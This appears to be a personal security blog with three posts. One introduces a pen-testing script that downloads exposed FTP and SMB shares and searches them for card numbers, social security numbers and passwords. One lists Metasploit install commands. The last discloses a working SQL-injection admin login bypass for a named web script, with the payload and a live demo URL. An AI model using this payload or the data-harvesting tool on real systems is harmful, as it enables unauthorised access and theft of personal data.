Wednesday, July 12, 2017

Introducing Booty Quest!

Booty Quest [BQ] is a little bash script I made to aid in my pen testing activities. While running a pen test I often find a large number of anonymous FTP servers, unsecured SMB shares, so on and due to resource restrictions I can't dive any deeper. While these are findings in their own right, it leaves a lot on the bone in my opinion. Finding these services are also hosting sensitive information could turn a medium finding into high or critical depending on the scale you use.

I have seen countless third parties "pen-test vendors" do the same and pass over looking at the data that is being exposed by the service. There are some tools out there with functions that are somewhat similar but nothing that does all the heavy lifting of making connections and managing the data like BQ.

So basically you find a anonymous FTP or SMB server, then you just plug in the IP of the host and in the case of SMB the share path. BQ will download all the files on the FTP server or mount the SMB share and then use grep and regex to locate IPs, emails, CC#s, SS#s, Phone #s, IBAN, usernames, and passwords. If it finds text files and images it will copy them to another location so you can sift over them later.

Basic setup:
After you download the script run:
chmod a+x bq.sh

Here is the basic help:
root@system:~/sec# ./bq.sh 
#######################
# [B]ooty [Q]uest                #
# By Adam Espitia               #
               # aahideaway.blogspot.com #
# Arr, matey,                       #
#  where be me booty!        #
#######################

This script will mount/download contact from a remote host and search it for sensitive information.

Usage here
./bq.sh nfs 192.168.1.1 /share/here/
./bq.sh smb 192.168.1.1 /share/here/
./bq.sh ftp 192.168.1.1
./bq.sh http 192.168.1.1 /dir/path/
./bq.sh local /dir/path/

Friday, June 30, 2017

Installing Metasploit on Debian 9 server

So I recently installed Metasploit on Debian 9, heres how:

apt-get install default-jre default-jdk software-properties-common
add-apt-repository "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main"
apt-get update
apt-get install oracle-java8-installer
apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev
curl -sSL https://rvm.io/mpapis.asc | gpg --import -
curl -L https://get.rvm.io | bash -s stable
source /usr/local/rvm/scripts/rvm
echo "source /usr/local/rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rvm install $RUBYVERSION
rvm use $RUBYVERSION --default
cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
RUBYVERSION=$(wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/.ruby-version -q -O - )
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
mkdir ~/dev
cd ~/dev
git clone https://github.com/nmap/nmap.git
./configure
make
make install
make clean
su postgres
createuser msf -P -S -R -D
createdb -O msf msf
psql -c "ALTER USER msf WITH ENCRYPTED PASSWORD 'blah';"
exit
cd /opt/
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework/
rvm --default use ruby-${RUBYVERSION}@metasploit-framework
gem install bundler
bundle install
bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
nano /opt/metasploit-framework/config/database.yml
datebase.yml contents
production:
 adapter: postgresql
 database: msf
 username: msf
 password: blah
 host: 127.0.0.1
 port: 5432
 pool: 75
 timeout: 5
More cmds...
sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
source /etc/profile
msfconsole...


Yeah that sucked, but it works!

Tuesday, January 3, 2017

My Click Counter 1.0 admin login bypass via SQLi

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: Admin login bypass via SQLi
[x] Vendor: http://software.friendsinwar.com/
[x] Script Name: My Click Counter
[x] Script Version: 1.0
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=15
[x] Author: AnarchyAngel AKA Adam
[x] Mail : anarchy[dot]ang31@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Navigate to scripts admin login page and submit ' or ''=' for username and password
and it should give you access to the admin area. Enjoy >:)

Demo: http://software.friendsinwar.com/scripts_example/my_click_counter/login.php